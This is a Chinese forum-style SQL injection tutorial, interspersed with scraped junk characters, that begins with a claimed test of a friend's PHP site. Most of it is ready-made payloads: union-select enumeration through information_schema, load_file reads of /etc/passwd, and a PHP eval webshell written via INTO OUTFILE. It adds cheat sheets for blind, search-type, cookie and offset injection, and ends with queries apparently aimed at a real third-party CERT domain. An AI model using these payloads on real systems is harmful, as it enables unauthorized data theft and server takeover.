我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~6 q: ` f; {; _: K* \
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?4 }7 T1 z5 K& Y' _" s
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。& b, C( R( i- U
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
; ^2 ?9 z3 b3 ~1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
4 f% w5 \. P( }9 {. K' B这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:6 g/ H8 H4 L0 J6 \& S# w
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
5 H& K% `. B& q; I3 q( U/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入& c* z5 S! p9 t( ]6 Q3 q9 u
) n# W& G I- V2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
9 ^9 D) Y; K& Y3 L. r6 J3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意" ^: i5 I: q3 ~7 ^$ ~3 T
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息5 ^( ?: j, M0 n$ b# ^& Y) U
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
# x& J8 ~# v- @+ o- f3 @4 J有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
% i" n9 ~" f( ?0 }2 ]& m2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
/ j& J: [- w3 e8 K6 W我就用的是第二个思路,* `: n) V+ ]$ r) g2 i9 R
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- ( R- P! \$ @" V4 ?
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,1 l; R- ]1 w4 D" l" _/ [& c
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--% c$ ]5 x. M) Q, j0 m9 @
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。+ X3 m- E# E$ p1 C- c: `, C
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办???? `& F8 ^1 q0 N9 k7 ~
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....4 p# W* P" r" n& h( q. m' x
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --3 c9 h$ T9 T. E4 s" P
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
( h5 x1 s. L4 _9 F调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......1 @9 k, i: n- n+ {; U4 P
下面是一些很普遍注入方式资料:4 @- `( c+ T' q7 o u
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='/ D* u0 R8 R9 ^0 r7 _
拆半法
( Q' I+ W9 [' K G, F& X4 C) k######################################
1 S/ [/ U8 N+ D- {* vand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
9 a' ]: R ]3 p0 aand exists (select * from admin)1 }% W" S5 S/ z/ A+ F
and exists(select id from admin)1 j6 @& K1 V4 n* N
and exists(select id from admin where id=1)
6 R- C3 W" R8 ~ M2 L) t8 Fand exists(select id from admin where id>1) & [- v- G5 H9 ?+ P
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
8 o `1 m7 S3 j: ]! cand exists (select username from admin), u9 e S( [1 o4 u8 @$ B; Q
and exists (select password from admin)# }7 K: j; _* z. B+ A
and exists (select id from admin where len(username)<10 and id=1), \2 V) F8 [+ c0 t9 j
and exists (select id from admin where len(username)>5 and id=1)
) o, f, d# k9 U% E. S% f; I: Kand exists (select id from admin where len(username)=6 and id=1)
/ Q2 ~! V& T2 w( B4 Land exists (select id from admin where len(password)<10 and id=1)
+ q4 X9 j) }- P9 ~3 Z" F" Uand exists (select id from admin where len(password)>5 and id=1)* l* z4 S( F( |% q, @; u
and exists (select id from admin where len(password)=7 and id=1)
. c6 x1 S W6 c3 n- Y8 K' n5 }and (select top 1 asc(mid(username,1,1)) from admin)=97! N+ g' F- [/ d! A) j: j6 c; `
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
0 B4 n3 J* e+ c1 a猜第二位把username,1,1改成username,2,1就可以了。& e6 G; r2 F) {
猜密码把username改成password就OK了" a! m; T3 ]8 f% G* U9 _. F
##################################################
7 R. ?- a& H9 S# Z! V, Y) |9 K4 X搜索型注入! g! s9 m# K: a' ~0 d
##################################
/ M: H6 Y, T& V* q%' and 1=1 and '%'='
8 Y1 l" [; t q%' and exists (select * from admin) and '%'='
# n/ _* K8 w0 J2 M a6 _3 O9 a& L%' and exists(select id from admin where id=1) and '%'='
5 i2 w% D/ [9 e! R%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
, W4 |2 W( U6 s# S8 q%' and exists (select id from admin where len(password)=7 and id=1) and '%'='2 E; H3 ~* W, Q |
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='6 z2 q' A# y4 e. m
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
* X# j( E4 V/ m! T: L0 i$ x对于MSSQL数据库,后面可以吧 and '%'='换成--1 K; ~6 E/ z: k
还有一点搜索型注入也可以使用union语句。- d4 V W& {+ [5 W* j
########################################################7 S2 }% e K' N i0 r
联合查询。
n- p. z0 u- |& s ?#####################################8 D: P9 c5 H% e1 r) E8 B; B
order by 109 {" d% t! N" {- e
and 1=2 union select 1,2,3,4,5,6,7,8,9,10% T/ t* y/ X- _
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
# V9 T, K+ l/ u0 M# y- L( Oand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
0 U" ], T! ~8 s& U3 X6 x# `) [很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)# m2 w& x3 ^- D, g
###################################
" |( h6 A2 E- B6 y$ ccookie注入
& }$ v. o, w" r. h! |###############################8 c( h* W# R) U
http://www.******.com/shownews.asp?id=127
# ]1 b4 L4 ?& G5 o/ P! `- g; phttp://www.******.com/shownews.asp
5 F `- O, W- A+ P8 _8 a9 S$ nalert(="id="+escape("127"));4 j% e0 g9 ^3 O9 Z1 ^$ B0 X
alert(="id="+escape("127 and 1=1"));, v, y6 u9 N: C' u2 K$ ?$ d
alert(="id="+escape("127 order by 10"));: v7 M8 J! E# F* |& Y# K, u* M
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
4 P; _ {7 l; Qalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
% U! U) s7 u0 B0 B3 }" g, u. X0 Z这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
$ a$ j, [+ y; Z, ^ m9 H0 C! X###################################5 ^7 e0 C+ M# a* C; e
偏移注入* I% ]9 \! I3 b% e$ R7 U+ O
###########################################################
& ^7 x9 M/ A% p7 Z: T; q: p% J2 Kunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin4 L. F2 u: \; P$ {" k3 \0 K9 n& K% t
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
. ^* i/ r/ k; [$ Q6 X5 [union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
& t; e% I j) w0 r& b! ?, Uunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)0 @/ o3 m: I. f& _$ j, c3 V
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)- ?/ b8 A8 ~1 A& n0 F/ S7 F
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)2 c! k6 S0 k; g! M% i. w$ w
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on$ I% D! _' p" u9 x8 n% ]
a.id=d.id)
" b0 m- y# _6 L9 S5 p \and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
( S! n! _. y& zand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) ' v5 M4 i3 N7 ?+ W6 ~
* X% M9 D f! I0 Z' A============================================================================================================
! U$ ^8 z4 B% A5 s4 p3 L1.判断版本
: B* b7 S& A% \* mand ord(mid(version(),1,1))>516 r# U* f& `! |9 S& I
返回正常,说明大于4.0版本,支持ounion查询
0 z; z/ k A% _3 R0 f9 G& D2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解" e3 T# I7 @- A4 e( }4 z/ G
and 2=4 union select 1,2,3,4,5,6,7,8,9--& g! ?' ^4 |4 v# @) ^& f+ L
3.查看数据库版本及当前用户,
: H; W) A2 b' }; M5 h8 S4 \& ]4 \6 I0 Land 2=4 union select 1,user(),version(),4,5,6,7,8,9--9 Y" A( D1 ?% l1 c
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
, D% [8 h! R" Q: Q" w4.判断有没有写权限- s0 Z5 |. V) l% R3 w- O" _* L
and (select count(*) from MySQL.user)>0--
2 L0 Q A3 y1 f6 d: A1 j5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
7 E6 U( M: O) _7 c6 G8 I( c用不了这个命令,就学习土耳其黑客手法,如下
% u/ v9 n4 H2 }and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--1 _, q& X; y- D0 F+ H; z7 h
6.爆表,爆库
7 j8 L) \# h1 U% u( s% zand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
) Q7 g+ b# ?+ V. e7.爆列名,爆表, X/ U( |3 F/ P- a6 e1 g
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
/ _7 T7 x7 w! [, @$ b/ a8.查询字段数,直接用limit N,1去查询,直接N到报错为止。" W" X/ |; C: m. G, L; T% S l
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
. E3 L# `& B, M0 t0 e4 m+ h$ `9.爆字段内容
9 O6 A4 q" H+ y# Z9 P! xand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
3 C5 J" N, o" ?5 ~$ Y" hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |